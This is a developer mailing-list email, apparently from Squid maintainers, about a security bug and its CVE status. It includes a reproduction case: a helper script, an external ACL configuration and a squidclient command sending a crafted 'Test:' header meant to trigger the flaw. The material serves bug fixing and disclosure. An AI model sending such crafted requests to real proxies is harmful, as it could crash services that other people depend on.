tis 2009-10-13 klockan 12:12 +1300 skrev Amos Jeffries: > Okay, I've asked the Debian reporter for access to details. > Lacking clear evidence of remote exploit I'll follow along with the quiet > approach.
Right.. meant to provide the details as well but forgot... It can be found in the RedHat bug report. https://bugzilla.redhat.com/show_bug.cgi?id=518182 A sample test case is as follows: -- test-helper.sh (executable) --- #!/bin/sh while read line; do echo OK done -- end test-helper.sh -- squid.conf (before where access is normally allowed) -- external_acl_type test %{Test:;test} /path/to/test-helper.sh acl test external test http_access deny !test -- end squid.conf -- -- test command -- /usr/bin/squidclient -H "Test: a, b, test=test\n" http://www.squid-cache.org/ -- end test command -- > The CVE has reference to our bugs which are clearly closed. If there is > more to be done to notify anyone can you let me know what that is please? > the other CVE from this year are in similar states of questionable > open/closed-ness. Ah, now I get what you mean. yes we should be more active in giving vendor feedback to CVE in general.. Contacting [email protected] is a good start I guess. Regards Henrik
